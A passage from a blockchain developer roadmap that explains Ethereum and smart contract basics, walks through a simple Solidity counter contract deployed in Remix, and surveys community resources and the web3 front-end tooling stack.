enforces the rules of the blockchain protocol, runs the consensus mechanism, that executes all transactions in the network and makes sure all nodes are in sync, and more. This is also known as core blockchain development, which is not what most devs picture when thinking about blockchain or web3 development in general. There are various niches within blockchain development itself as well; you can focus on improving execution capabilities with technologies like rollups, validiums, or volitions, you can improve decentralization and security guarantees by innovating on the consensus layer of the protocol, etc. Blockchain API There's also blockchain infrastructure that supports the application layer by providing APIs to access blockchain data like oracles for smart contracts, indexing services for back ends, libraries that allow you to call and listen to smart contract events, decentralized storage services, and more. There are applications that aggregate data from different smart contracts, transactions, and events on the blockchain to provide useful insight, these apps are mostly centered around data analysis and are not necessarily decentralized, but require an understanding of the underlying blockchain-based technologies. Blockchain application layer The most popular type of blockchain development is on top of the application layer. Building decentralized applications (Dapps) can take many different forms, but it usually involves a smart contract and a user interface that interacts with that smart contract and listens to changes in the state of the blockchain. These applications can serve various use cases and can be used to build decentralized financial services, games, and so much more. If these concepts are completely foreign to you I suggest reading the how to get started section first, or Google the words you may not understand. Specializations There are many different specializations within blockchain development, each requires a different set of skills, however a general understanding of distributed systems, basic cryptography, and knowing how smart contracts operate is required as a foundation for all of them. In this guide I'll try to provide a general overview of each of them, as well as give the best guidance I can provide on the resources learners should prioritize and in which order they should take them. There are many roles that I'm not as familiarized with, so feel free to suggest pull requests with changes or DM with suggestions. Skill-based There are different sets of skills required for different specializations, the technology stack and knowledge needed are determined by the layer and application that you want to target as a developer. I believe that everyone should get a solid general foundation and try out different areas and niches before settling on the main stack they want to focus on. Some people choose specializations according to the end goal that they want to accomplish using blockchain-based technologies, others like myself feel like everything is interesting and can't settle on a single one to specialize in when confronted with an analysis paralysis situation. This guide will cover these main tracks, however anyone is free to submit a pull-request to add more or expand on the already existing ones: Frontend development Smart contract development Backend blockchain development Core protocol development Full-stack blockchain development Cryptography Coming soon Security engineer MEV searcher Cryptography Blockchain data analytics Application-based Another way to separate types of blockchain development is not based on the underlying tech stack, but on the use case that you are targeting. These are the categories that I believe are the most popular, however, there are many others that I'm not covering to keep the scope of this article more manageable. Coming soon DeFi Creator Economy MEV L2s Infrastructure Gaming Privacy Coordination / Public goods Non-technical sections Getting a job Social Capital Mastery Community How to get started? No matter if you are a beginner programmer or if you've been coding for years, this guide will provide resources for all levels of expertise. If there is something that you already know in the specialization roadmaps that I have here, feel free to skip the material or use it as an opportunity to review what you already know and potentially fill in some gaps in your understanding. Blockchain development might seem very intimidating at first, there are many moving parts, foundational knowledge from various different fields is required, the technologies are constantly evolving and aren't as mature as in other areas of development such as in the web development space, there is a financial aspect to almost every application as you are programming on top of a value layer, etc. However, it is not as hard as you might think. Once you get familiarized with the basics, understanding everything else that is going on is usually just a matter of applying a general understanding to a specific situation. If you build a strong foundation then it will be much easier to process more complex topics and reason about problems relating to a new subject matter. If you have a background in computer science, mathematics, or any related field, then you will have a much easier time getting started with blockchain development as many foundational concepts are abstractions of algorithms and data structures. If you are a complete beginner then please make sure you take the initial few steps with patience so as to not feel overwhelmed. Once you start familiarizing yourself with the material you will start to feel like it is more manageable. General foundation In order to get started with blockchain development, one must first get started with understanding how blockchains work in order to build a mental model of how each moving piece works and to get an understanding of the design principles which will govern your development experience. Blockchains The term blockchain has two different meanings, it can either relate to a data structure or to a computer network. A blockchain (data structure) consists of sets of transactions or data bundled inside a container where each container has a cryptographic hash of the data in the previous container (block) within it. If the contents of the previous block change, the hash changes as well and thanks to this feature we can assure that the data hasn't been tampered with. The second consequence of the blockchain data structure is that it is append-only. You can't prepend data to it, nor modify the data already within it, as that would alter the hashes of all the blocks succeeding the ones that have been modified. This is why we call blockchains immutable. A blockchain (network) is a network of computers that have a synchronized ledger of transactions that uses the blockchain (data structure) for storing data (usually inside of merkle/verkle trees). The blockchain is powered by miners/validators which operate under a so-called consensus algorithm, this algorithm helps coordinate who produces and organizes blocks as well as indicating which is the longest chain, by updating the head of the blockchain continuously. Blockchains have 3 main properties which they try to optimize for; Security, Decentralization, and Scalability. They achieve security and decentralization through their consensus algorithm where many different parties need to either provide resources mostly in the form of running expensive operations on massive hardware facilities with Proof-of-Work (PoW) or by staking economic resources in the network with Proof-of-Stake (PoS). The more participants and the more distributed the power dynamics among those participants, the more security and decentralization. There are many other features that contribute to decentralization, like client software which is able to be run on consumer hardware so that anyone can synchronize the state of the blockchain in their nodes, minimizing how many transactions you can process per block so as to not make the state of it too big and much more. Further reading In order to understand how blockchains work beyond my simple explanation here read and watch the following resources: - Blockchain Explained - Investopedia - Blockchain 101 - Anders Brownworth - But how does Bitcoin actually work? - 3Blue1Brown - Optional (cultural significance): Bitcoin whitepaper Ethereum Since this is a guide about blockchain development on Ethereum, it is required to know how the Ethereum blockchain works, and the changes that it will undergo in the future so as to be prepared for what's to come as a developer. If you have done web development before you can think of changes as a new ECMAScript standard, a new browser compile target (ie. WASM), a new engine (V8), etc... The Ethereum blockchain is constantly evolving and quite a few changes will be put in place in the future before the core technologies of the network will start to ossify. A good way to get started with how Ethereum works is to watch Austin Griffith 's ETH.BUILD YouTube playlist where he illustrates how various parts of the Ethereum blockchain work. "In the Ethereum universe, there is a single, canonical Turing-complete(computational universal) computer (called the Ethereum Virtual Machine, or EVM) whose state everyone on the Ethereum network agrees on. Everyone who participates in the Ethereum network (every Ethereum node) keeps a copy of the state of this computer. Additionally, any participant can broadcast a request for this computer to perform arbitrary computation. Whenever such a request is broadcast, other participants on the network verify, validate, and carry out ("execute") the computation. This execution causes a state change in the EVM, which is committed and propagated throughout the entire network." (source: ethereum.org documentation ) In order to learn the basics of Ethereum, go through the ethereum.org documentation . Here are links for each section: Intro to Ethereum Intro to Ether Intro to dapps Web2 vs. Web3 Accounts Transactions Ethereum Virtual Machine (EVM) Gas (skip the Opcodes section, we'll revisit that later) Nodes and clients Networks Consensus mechanisms Governance / EIP process Ethereum roadmap - Endgame This graphic shows all the different changes which are being implemented to Ethereum in the upcoming years. It's not necessary to understand what this is all about, but it is good to know about. I suggest watching the video resource appended after the graphic to learn more about what these flowcharts mean. Further reading Ethereum Whitepaper Why Proof of Stake - Vitalik Buterin Smart contracts A smart contract is a program that runs on the Ethereum blockchain. It's a piece of code that has functions and data (state) which resides at a specific address on the Ethereum blockchain. Smart contracts are a type of Ethereum account meaning that they have a balance and can send transactions over the network. They are deployed on the network and run as programmed, user accounts (externally-owned accounts, or EOAs) can interact with a smart contract by submitting transactions that interact with functions that are publicly accessible. Smart contracts can be used to define rules which are enforced via code, e.g. a smart contract that allows for two parties to swap their tokens (like Uniswap). How do I create a smart contract? The most popular smart contract programming language which targets the Ethereum virtual machine is Solidity . It is a high-level language that was influenced by C++, Python, and Javascript and so its syntax looks familiar. Solidity is statically typed, supports inheritance, libraries, user-defined types, and more. Solidity is a compiled language, which means that before having a runnable smart contract, a Solidity program needs to be run through a compiler that generates a low-level interpretation which is called bytecode. Bytecode are instructions that the EVM can understand and execute. There are other languages that can be used to target the EVM like Vyper and Fe that have their pros and cons, however, they don't have as robust development ecosystems and aren't as widely used by projects deployed in production. Here's how a simple counter program would look like in Solidity: ```js // SPDX-License-Identifier: MIT pragma solidity ^0.8.10; contract Counter { uint private count; // Function to get the current count function get() public view returns (uint) { return count; } // Function to increment count by 1 function inc() public { count += 1; } // Function to decrement count by 1 function dec() public { count -= 1; } } ``` In the beginning, you declare the version of Solidity you are using the pragma solidity + version keyword. To indicate the creation of a contract you write it using the contract ContractName {} form. Within the contract curly brackets, the logic of the program is declared. We then declare a simple private variable with the name count with unsigned integer type (meaning it can only hold positive integers). Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. Afterward, we declare three different functions, one to retrieve the value held inside of the count variable, one to increase the variable's value by one, and the last one to decrement its value. The public keyword specifies that the function can be called by any address on the blockchain (be it a smart contract or a user-owned account). The view modifier specifies that the function doesn't alter the state within the contract (it only reads values already available). The returns keyword is used to specify the type of the object that is returned back by the function, unsigned integer type in the case of the get() function. Everything which is written after a // is considered a comment and is ignored by the Solidity compiler. Comments are used to make the code more readable and manageable, which is especially helpful if you are working with teams or revisit a codebase after some time. It also acts as documentation for what the code it is doing. How do I compile and deploy my first contract? In order to compile and deploy our first smart contract, we will use the Remix IDE which is a website where we can write smart contracts, compile them and deploy them on a local instance of the EVM. We can also interact with the local deployed smart contract to test out its functionality. To deploy our simple counter contract, go to Remix , add a new file in the contracts directory, name it Counter.sol , and copy-paste the code in the counter example . Now click on the second icon from the top in the selection bar on the left, it is the logo of the Solidity programming language and it symbolizes the Solidity compiler in Remix. In the compiler dropdown select 0.8.10 which is the Solidity version in our smart contract and click "Compile Counter.sol". After you have compiled your contract click on the third icon from the top, it should have the "Deploy & Run Transactions" name. Click "Deploy". After you have deployed, you should see a list item with "> COUNTER AT 0x.... (MEMORY). You've successfully compiled and deployed your first smart contract! Now that you have it deployed, you can interact with it by calling the inc() or dec() functions to increase or decrease the value of the count variable. You can call the get() function to retrieve the value of the count variable. We will go into a lot more depth on how smart contracts are programmed, tested, and deployed in the smart contract development section. Web 2.0 Although blockchain developers build decentralized applications, the technologies used to build these applications overlap to a big extent. User interfaces for Dapps are hosted on the internet and are built with traditional web technologies. In order to interact with a smart contract, a user needs to submit a request to a server that hosts an application and that application needs to create a transaction, get the signature from a user via a web3 wallet like Metamask, and then submit the transaction to an Ethereum RPC. The transaction then goes to the mempool, gets picked up by a miner (PoW) / validator (PoS), gets executed and included in the blockchain, and the user interface updates once the blockchain emits an event with a successful call of a function inside of a smart contract. This is the usual flow that decentralized applications have. Any blockchain developer that wants to build full-stack applications needs to know how the internet and its most important protocols work as well as how to build user interfaces for all the major platforms (web, mobile, etc). You can think of web3 as adding a native value layer to the internet, it also helps with social coordination and resource allocation with the decentralized autonomous organization structure. It is very helpful to know how the web and the existing technologies built on top of it work and understand how crypto and web3 work in order to create better applications. I believe that even though you might not work with developing front-ends it is still good to know how they work on a foundational level as in almost all kinds of development you'll interface with the web in some form. A good learning roadmap for the basics of how web technologies work is the roadmap.sh frontend initial steps in the roadmap. It is also a must to learn how to version control your code, Git is the most popular version control and collaboration software along with GitHub / GitLab for hosting repositories and interacting with other coders. Learning resources How does the internet work CS50 HTTP lecture (the CS50 course on edX is a great intro into computer science) freeCodeCamp - Here you can learn the basics of how HTML, CSS and JS works. Unless you're planning to write frontend interfaces you won't need it, but it's still good to experiment and learn how it works. What makes decentralization important? In the web 2.0 world, we're used to have a main account on platforms like Google and Facebook which we use to log into other services. All of our data is hosted inside of centralized databases and our private information is used in advertising software to sell us products. In exchange for our data, we get free services. These big centralized entities have a lot of power and control over our daily lives through the products we use each and every day. This is the business model which has worked for the past few decades. When you decentralize the services and become a sovereign user, you can't be de-platformed, censored, or exploited. As long as you have access to a computer and to the internet you can use any application running on a permissionless and decentralized blockchain. Nobody can block access to them fundamentally, because you can always run a node and submit a call a smart contract and submit a transaction in the blockchain network. Decentralized applications are still in their infancy and many technologies are still not mature enough to support mainstream adoption, however, there is a huge demand for these applications and the industry is evolving rapidly. In a web3 world, users own their assets, their money, their identity, and their data. This allows for a better user experience fundamentally, and even practically once these technologies become mature enough to support the masses. You can eventually have applications like decentralized social networks where users own their content, artists and musicians can produce their artwork and sell it as NFTs and get revenue from royalties and better engaging with their audiences, you can have virtual worlds where people own their digital identity, their virtual items, and their land, etc. The possibilities in web3 are growing day by day and I think it is one of the most exciting technologies that humankind has ever devised. It unlocks so much potential. Web3 values The web3 movement is one about creating a value layer for the internet where we can setup incentive structures for the betterment of society in order to make a fairer world where access to products and services is openly distributed, permissionless and accessible to everyone on the planet no matter their provenance. There are many good initiatives like Kernel , Gitcoin , GreenPill and many others that try to help educate about and fund the new wave of public goods and inrastructure in order to create a better world. As a blockchain developer, it is good to get a feeling for why these systems are built out in the first place and the values the products and services we create embody so as to not recreate the centralized web2 world we currently have. In order to learn more about web3 values and how we can create a fairer world, go over Kernel's web3 lessons . Play around Blockchain development might feel overwhelming, and frankly very intimidating when you are starting out. To remedy this feeling, I suggest you look at programming on blockchains like an adventure game. You can explore what is possible, experiment by creating small projects with technologies that you find interesting, looking at what other people are building and interacting with their applications, debate with various people about their favorite applications, technologies and get a feel for how everything works. As you progress through this guide, you'll start going deeper into various different fields. There is a myriad of interesting primitives in web3 and types of applications you could build and so to pick what to specialize in from the get-go is very hard unless you have a clear goal in mind from the get-go which is quite rare. I personally think that trying everything that interests you if at least for a short while can get you a glimpse into that field and give you insight on whether you'd like to focus on that particular area. For this I suggest getting into different developer and research groups and talking about how is it like building those things, what are the types of problems you would be working on, how does one get better in that field, what is there to work on, etc. One of my favorite such groups is Newt which is Aave's experimentation branch. Newt is completely community-driven and tries to promote open-source experimentation where the community is welcome to contribute to existing experiments or create their own. Here you can meet like-minded developers, build cool projects, explore different areas of development and different fields within web3 such as DeFi, NFTs, and more. DeveloperDAO and EthernautDAO are also good developer communities where you can search for like-minded individuals and explore the possibilities of what's possible in web3, and potentially even getting full-time job offerings. Connect Blockchain development is a fairly new field and so most information about how to build applications in web3 is available on the internet and not in universities and other educational institutions. This might make it a lonely endeavor, but it need not be! There are people all across the world learning how to build cool projects with these technologies and everyone is looking to learn from each other and make friends in the space. As mentioned before, join DAOs and groups like Newt, DeveloperDAO, EthernautDAO, etc, talk about your learning journey on Twitter and try to provide insight into your experience with learning these technologies. You're bound to find like-minded individuals with whom you can share your interests, it helps a lot with learning the material as when you have to explain a complex topic to a person without former knowledge, it forces you to understand your subject very well in order to explain it simply. Pair-programming or pair-learning is also a good way to cement new learnings. Personally, I found that making friends online that are also into blockchain development is what made it the most fun and engaging for me and is helping me stick with the material for longer periods of time than I otherwise would have. Twitter is currently the platform where most builders, researchers, and creators share their insights in the realm of blockchain and web3, so it is almost a must if you want to keep up with the newest technologies. I also recommend to not overdoing social media as it can lead to a drastic decrease in productivity. It's a balance that needs to be achieved over time, a good tip is that whenever you want to check Twitter or Discord you have a clear goal in mind, e.g. goal: I want to learn what new gas optimizations have my friends come up with? I also recommend creating lists with different types of people so you can sort by the type of content you want to see (DeFi, NFTs, MEV, smart contracts, frontend, design, etc). Bookmarking is also a good feature if you want to revisit interesting tweets in the future. Another great way to meet devs is to go to hackathons and conferences. If you can afford to go to events then definitely do, however, if you don't have enough funds there are oftentimes grants for first-time attendees through places like PadawanDAO , and others. Usually asking around to volunteer will get you a free entrance and people are usually kind enough to pool funds to sponsor people looking to get into the space that doesn't have the means to afford to travel by themselves. In-person events like hackathons are a great way to develop your skills and meet people. It's where many projects that are popular today were started and the place where founders of projects usually meet for the first time. As for events worth going to in 2022, I suggest Devconnect (Amsterdam), ETHPrague , ETHCC / ETHParis and Devcon (Bogota). Here is a good list with Ethereum-related events in 2022, there are also events on pretty much every continent and there are also small local events that different communities organize, so look for events near you that might be related to blockchain development in some way or start one yourself! I also recently started creating a Twitter list with blockchain devs that I think you should follow if you want to learn blockchain development. It is a running list so feel free to DM me devs I should add and I'll consider adding them to the list. Build The next and final step to get started with blockchain development should be obvious by now, it is to actually start building! After you've gone through the introductory foundational material that I wrote in the sections above you are ready to get going with one of the specializations listed below. If you are not sure which one you're into yet, just go with full-stack blockchain development and you'll get to try a bit of everything! Start writing code, no matter how bad it is, and try to get feedback on it from devs that know more than you do. Go through the roadmap that I have specified below, learn a concept, take notes, build something around it, do some testing and move on. If there is something that catches your attention, then try building something with it and see where it takes you. Your own curiosity and interest are your best friend when learning blockchain development. You should constantly ask yourself why did the thing that I wrote worked and how I could make it better, if you can't come up with an answer you either ask someone for an explanation or for a code review. It is also good to review quality code written by other teams. If you are learning Solidity, for example, the best way to learn advanced Solidity is to read into production codebases like Aave v3, Uniswap v3, Balancer v2, etc. The same principle applies to other categories and specializations as well. Once you build something, share it with the world (unless it's a very profitable MEV bot)! Sharing it on Twitter and different Discords will bring attention to what you're doing and you might get constructive feedback and/or meet new friends that are interested in what you are building. If you are building something more complex, try creating documentation for it or make some useful comments if you expect other people to read your code. It is also great to share code and make it publicly available on hosting platforms like GitHub to build a portfolio of projects which you can showcase in order to show other people when applying for job positions. I'll revisit how to get employment in web3 in a later section. Skill-based development Now we get down to different specializations, before getting started looking at different paths you can take make sure you've gone through the Foundational section . I also suggest reading the introduction to each specialization in both the skill-based development and application-based development categories so that you have a better idea of what's out there and what you might find interesting before going deeper into any specifical one. This section will focus on categorizing specializations in blockchain development with regard to the skillsets required within them. Front-end development Front-end (FE) development is highly reminiscent of traditional web (“Web2”) development. This includes the technology stack involved in building out user interfaces connected to blockchain technology. Just like in traditional environments, FE blockchain developers are expected to fetch data and interact with APIs in order to produce a seamless user experience on a decentralized application. As a result of the overlap in these core competencies, front-end developers are able to leverage a mature ecosystem of tried and true languages, libraries, and various other tools that will be covered in this section. Additionally, these similarities contribute to a much more frictionless onboarding process for developers who are new to frontend development. These developers are able to tap into a mature ecosystem composed of developers who eagerly impart their knowledge via platforms such as StackOverflow . This also extends to the availability of well-produced tutorials and documentation for grasping these well-established technologies. Note, however, that this is not the norm in such a rapidly emergent ecosystem, such as Web3, which makes frontend development the most popular choice amongst those new to blockchain technology. The key principles of front-development require knowing how to structure and style websites, how to make them dynamic with JavaScript and different frameworks, how to manage state within applications, basic design, how to fetch data from APIs and databases, and how to create good web3 user experiences regarding wallets and the interactions with the smart contract backend of your application. One of the biggest differences in web3 FE development is user-authentication as instead of logging in with your email and password or your Google account, you log in with your wallet using a third-party application like Metamask or WalletConnect and protocols like ENS to display information about the user (provided they have an Ethereum domain). If a smart contract contains a state which represents past interactions with the application by the user, you also need to fetch historical data from the blockchain on-demand or maintain a local database with indexed data which is easily queriable by the FE of the application. As a front-end blockchain developer you need to know what a Contract Application Binary Interface ( ABI ) is in order to be able to interact with smart contracts on the Ethereum blockchain or on an L2 like Optimism, Arbitrum, Starknet, or ZkSync which are Ethereum-based scaling solutions that we'll cover in the L2 section . You also need to query data from various APIs to accurately display the price of various assets (if applicable), the user's balance of ERC20 tokens or NFTs, and various other data you might need from either the blockchain itself or an external database. Another interesting feature of programming decentralized applications is the need for building applications that are not hosted on a centralized server, to remedy this problem many developers have their web interfaces open-sourced and have many instances of those interfaces on decentralized storage solutions like IPFS, Arweave, and others. In this way, if one of the servers hosting the interface to interact with the smart contracts goes down, users can interact with it from many other different places. It's also amazing that since the functions are able to be called by anyone, users can interact with decentralized applications from completely different frontends as long as they have the ABI, this allows for massive composability which we'll cover a bit later. This roadmap will focus on the frontend technologies that I've seen are mostly used in blockchain development today. I've used the roadmap.sh frontend roadmap, a friend's tech stack, and my experience as a reference for creating this specialization. If you are a more experienced reader feel free to suggest pull requests to add/edit/remove content or you can suggest changes by DMing me on Twitter or Telegram (@dcbuild3r). HTML, CSS, JS, Web APIs The pillars of web development technologies are HyperText Markup Language (HTML), Cascading Style Sheets (CSS), JavaScript (JS), and web application programming interfaces (APIs). HTML is the language that is used to structure websites, with HTML you can insert text, images, videos, create different sections for your website, create links to other sites, and more. CSS is a styling language that helps you edit how your HTML elements look, how they are displayed and how they are arranged on your screen. It is also what makes user interfaces responsive for different devices like mobile, tablet, laptop, desktop, and others by providing APIs which dynamically resize your HTML elements based on the width and height of the screen a specific user has. JavaScript is a programming language that makes your HTML elements dynamic, it allows for things like complex animations, dynamic formatting of elements depending on given inputs, state management within your application, much more utility thanks to its programmability, and more. HTML, CSS, and JavaScript are the only 3 technologies that browsers understand, the rest of the technologies mentioned in this specialization end up compiling to an optimized HTML, CSS, and JS bundle which the browser can process and interpret. The best place to learn the basics of web development in my opinion is freeCodeCamp where you can do the lessons in the first two sections named "Responsive Web Design" and "JavaScript Algorithms and Data Structures". It says that each section takes about 300 hours each, but usually, you can do it in much less since it's a conservative estimate. After you've gone through these two sections and made the initial projects that are required to fulfill them you can move on to learning React. React In modern web development, you'll almost never write vanilla HTML, CSS, and JavaScript to build your websites. Web developers learn a view framework that helps them to better structure their code with components and also optimize the way in which components are rendered and how changes to the state of the application affect what the users see. The most popular web development framework is React with a wide margin compared to Vue.js. React was originally developed by the Facebook team, but was open-sourced early on and now it has thousands of contributors and many full-time maintainers who are constantly pushing the framework forward. Most of the user interfaces for blockchain applications are programmed using React and there are many React component libraries that you can reuse from the community to perform common tasks like logging with an Ethereum wallet, switching networks, and also so-called React hooks libraries (i.e. eth-hooks ) which let you fetch different data like balance, block number, prices and more. I believe that React is best learned from the official documentation, but there are also other resources for people that learn better with video content. Here is a list of React learning resources that I recommend: - React in 100 Seconds - Fireship - React roadmap - Official React documentation - awesome-react - This GitHub repository aggregates many useful resources for React developers, it has tutorials, tooling, component libraries, frameworks, design patterns, guidelines, and much more. It is a good place to look for inspiration and resources when using React. - If you want a paid video course I can recommend either ZTM's React course or Maximilian Schwarzmuller's React course . On Udemy there are sales periods every once in a while which allow you to buy courses for $15 instead of $200 , so wait for one of those, never buy for the full price. - freeCodeCamp React course on YT - Learn React for free After you feel like you've understood how React works, you have learned about lifecycle methods, hooks, how to pass down data through props, how to use the Context API, etc. I recommend trying to build the front end of a web3 app like Uniswap or an NFT marketplace like OpenSea. To rapidly prototype the design I recommend using tailwind.css and Chrome browser developer tooling to inspect the styles of the site you're trying to recreate. Also, don't forget to use CSS flexbox/grid where necessary. Try to simulate the data inside of these apps using hardcoded JSON objects. Typescript Typescript is a superset of JavaScript which allows you to statically type JavaScript code. This means that you declare the types of variables (integer, string, ...). It allows for a better developer experience as the Typescript compiler can catch many errors ahead of time since it checks the types of the objects ahead of time. It also allows developers to tap into extra features on top of JavaScript which allows writing more expressive JavaScript. Remember that Typescript cannot be run by the browser and needs a compiler to convert TypeScript code into runnable JavaScript. Typescript is widely used by the web-development community thanks to its features that improve security, readability, allow for a better development experience inside of the IDE with autocompletion, and add cool new syntactic sugar on top of JavaScript. I recommend going to the Typescript documentation , it is good to get into the habit of going to official documentation since they are usually the right place to visit if you are learning new technology. Once you have the basics down try building a simple application with it or refactor an existing application in a way that uses the technology that you are learning. Next.js Next.js is a React framework that enables server-side rendering, static site generation, does smart bundling, route pre-fetching, and a lot more. Next.js is able to heavily optimize your websites by only loading what you need on-demand instead of having to load up the entire site at the beginning. It also allows for a much better experience with creating API routes thanks to its file-system routing feature, it optimizes images, it has Typescript support, it helps with i18n API internationalized routing, and a lot more. Learning resources: - Next.js documentation - awesome-nextjs Moralis Moralis is a web3 development platform that helps abstract away the pain of having to build all the backend infrastructure needed to run web3 applications from scratch. Moralis provides an easy-to-use API that lets you fetch any data that you want from various blockchains, handles web3 user authentication, allows you to listen to smart contract events in real time, gives you access to historical data, has support for cloud functions, and much more. If you've never worked with blockchains it is the best way to get onboarded and start building web3 applications, as the Moralis SDK is intuitive to use for anyone that has experience with JavaScript/TypeScript. Learning resources Moralis documentation Moralis YT channel Web3 libraries Ethers.js is one of the most popular libraries for interacting with the Ethereum Blockchain and its ecosystem. Smart contracts that are deployed on the Ethereum blockchain have functions that can be called externally by any other account on Ethereum, be it an externally owned account (EOA = user wallet) or another smart contract. Many of these functions require certain parameters to be fed into them, they also rely oftentimes on an external state like prices of tokens on the blockchain, balances of the user's wallet, and more. Ethers.js is what allows a user interface to call these functions, users can input certain information in the frontend of your application and that information can be put into the function call of the smart contract, after the transaction is broadcasted the EVM will try to execute that function call and if every check inside of the function doesn't give out any errors it will execute, otherwise, the transaction will revert. Ethers.js is currently the most popular Ethereum library among developers, but there are alternatives like web3.js, web3.py, Brownie, and many others. The second most popular framework is web3.js and it is the Ethereum JavaScript library that has been around the longest. For a comparison of ethers.js and web3.js read this article written by the Moralis developer team. Learning resources - ethers.js documentation Web3.js is a collection of libraries that allow you to interact with a local or remote ethereum node using HTTP, IPC or WebSocket. The web3 JavaScript library interacts with the Ethereum blockchain. It can retrieve user accounts, send transactions, interact with smart contracts, and more. Learning resources - web3.js documentation Design As a front-end developer, you need to focus on how your application looks and how it feels to use it. A big part of that is designed, before building a website you should prototype how you want it to look, design how your users will interact with your application, how will that fit with the use case of your application, and what you want to accomplish with it, how to make it so that your users like using it and more. UI/UX is a specialization of its own, but every single front-end developer should have strong foundations in UI/UX regardless. Most big teams will have designers which will prototype applications using tools like Figma, Framer Motion, and various other tools. As a front-end developer, your task is to turn those designs into functioning code and hook all of the components to the APIs and databases necessary as well as creating the functionality of the application. One of the most popular tools to prototype and design websites is Figma, so every FE developer should know how to use the application. Learning resources - freeCodeCamp Figma YT course Web3 templates When you are building web3 applications you usually start with a template. A template is just a group of libraries, pre-built user interfaces, and another tooling that create a favorable environment to build your application. A lot of the initial hard work to set up a project can be reused across projects to save time and effort on building redundant infrastructure. Many web3 templates have support for smart contracts out of the box which is what you'll be interacting with most of the time as a front-end developer. It is good to know the basics of smart contracts and understand how to get a contract factory out of the ABI to call its methods within your user interface. That's the biggest overhead when building in web3 in comparison to being a frontend developer in web2 where you only have to care about fetching data from REST or GraphQL APIs. You can build your own templates depending on your needs, or modify already existing ones. Popular web3 templates include - moralis-starters - scaffold-eth - create-eth-app Tooling As a developer, there are many tools you'll use to make building applications easier and more efficient, to collaborate on projects with other people, to manage dependencies, and much more. This is a short section on different tooling you'll find yourself using regularly. Package management If you've gotten this far in the front-end specialization you've certainly had to install packages like React, Next.js, tailwind.css, ethers.js, and many others. The most popular package managers in the JavaScript ecosystem are npm and yarn . Package managers allow you to keep track of which versions of which external code libraries your application uses as well as how the project's code is structured, how to run different tests, how to run your program, and various other miscellaneous tasks. As you build more complex applications it is good to learn the depths of your package manager, how to structure package.json files, how to write scripts that automate the boring stuff, how to set up a CI/CD pipeline (we'll talk about this in a bit), and more. Package management basics npm yarn Styling/Animation There are many CSS libraries and frameworks which modify the way in which you write CSS. There are libraries that allow you to write CSS within JavaScript, component libraries for React which have a lot of the styling done for you, animation libraries, and more. I'll mention a few of the most popular ones, feel free to suggest changes as I'm not an expert in the area. styled-components (CSS in JS) Tailwind.css (CSS framework) Framer Motion (Animations framework) Chakra UI (component library) Material UI (component library) Next UI (component library) Sass (CSS pre-processor) PostCSS (CSS pre-,post-processor) awesome-CSS (CSS learning repo) Linting/Formatting A linter is a static code analysis tool used to flag programming errors, bugs, stylistic errors, and suspicious constructs and a code formatter makes sure that the code you write has a homogenous style structure and abides by the formatting rules of a specific programming language (i.e. PEP8 for Python). When you're writing code, it's easy to miss a space, a tab, a colon, an opening or closing bracket, or to write code with bad and inconsistent styling. That's where linters and formatters will come in handy as they automate the task, they can be configured to run on saving and on commit, so that badly styled code never gets into production or into a public repo. The most popular choices are: Eslint Prettier CI/CD CI/CD stands for continuous integration / continuous deployment, they are a set of tools that allow you to create automatic processes that execute whenever a change is made to the codebase usually hosted on the cloud so that the production servers running your application get automatically updated with the newly pushed code. These actions can also modify and run tests on the code before it gets pushed into production, if tests fail the commit or update will not go through and collaborators will get notified of this. Once projects become bigger and they have big teams of contributors a solid CI/CD pipeline is very important so as to maximize the security and correctness of code being pushed into production. Examples of popular CI/CD tooling are: GitHub Actions CircleCi Husky Testing A key part of development is mitigating how many bugs are inside of your application. To ensure that the code behaves as it is intended to we write unit tests , integration tests or even end-to-end tests . Each kind of test focuses on a different part of the application lifecycle. Modern tooling like Cypress allows you to simulate all possible states of your application and simulate user flows, you can even record user session tests as if you were recording a real user going through your website. In web3 you will also be doing integration tests for smart contract interaction. You can test smart contracts using libraries like Foundry , Hardhat or Truffle . Most of these tests will be written by a smart contract or full-stack developer, however, as a frontend developer, you need to test how the interactions with the contracts will influence the flow of the user interface of your application. You can write various tests in JavaScript with ethers.js and couple it with Cypress to write complex tests. The web3 app development lifecycle usually goes from locally deployed smart contracts and front-end, to testnets (live network environment but with non-valuable assets), and to mainnet (not necessarily Ethereum mainnet, it can be an L2 like Arbitrum, a sidechain like Polygon PoS, etc). On the smart contract, side development teams hire external security auditors to verify that the contracts are secure to use, we will cover this in-depth in the smart contract development section . Cypress Jest Mocha ENS integration ENS domains are human-readable domains for Ethereum addresses, the registrar for these domains is fully on-chain and the protocol is decentralizaed and governed by a DAO. ENS domains serve as an on-chain identity mechanism which many Ethereum users use to express themselves on-chain and to display information about themselves through ENS profile metadata containing contact information like email, Twitter, Discord or links to websites, a profile picture (NFT image metadata) and more. As a web3 front end developer you can tap into this registrar and display users' information once they've connected to your application with their web3 wallet. The best way to get started with ENS is their official documentation , here you can get a general understanding of the ENS protocol. For integrating ENS into your dapp, visit this section . You need to perform 3 steps in order to support ENS within your application: Resolve ENS names Support reverse resolution Let users manage their ENS names If you are interested in how the on-chain parts of ENS work, check out the smart contract development section Further learning and development By now you have learned a solid technology stack that can enable you to build all kinds of user interfaces for web3 apps. In order to really engrain these technologies, you need to build pet projects or join a team full-time, even if you only know a few of them you can join a team and get upscaled there as your learning will be supercharged by more experienced coworkers that will act as mentors most of the times. The front-end development landscape is constantly evolving new technologies will come and go, it is in your best interest to look at trends in the industry and try adapting them once they are a clear sign of them becoming adopted. You will keep improving your technology stack over time especially as you become more senior and you are able to reason why you want to use one tool over the other and how it fits into the needs of the applications that you are building. Build, Build, Build! Try creating small projects that implement ideas you come up with and practice the technologies you want to master. Also, don't be shy to ask questions to other web3 developers, and form learning groups with your friends, or other industry members. Also, read over the Getting a Job and Mastery sections of this guide to get more insight into soft skills which are useful to learn to grow as a developer. Smart contract development Writing decentralized applications (Dapps) requires knowing how to write smart contracts as they are pieces of code that live on blockchains that can be executed inside of virtual machines. To write contracts you need to learn the programming languages that are able to compile to a target that the virtual machine can understand. In the case of the Ethereum blockchain, we have the EVM which has a set of operations it supports (a.k.a OPCODES). The most popular language for writing smart contracts on Ethereum is Solidity, which is a statically typed, object-oriented high-level programming language that takes inspiration from C++, Python, and JavaScript. With Solidity, you can program logic that executes inside of the EVM and the result of its operations is stored on the blockchain forever. The state of these applications is easily accessible from a full-node or from a third-party data indexing platform. The goal of smart contract developers is to create secure applications which perform a certain action, for example, a contract that allows for users to swap tokens, to buy and sell NFTs, to vote on proposals, etc. There are many different stages in the smart contract development stage, from experimentation, iteration, 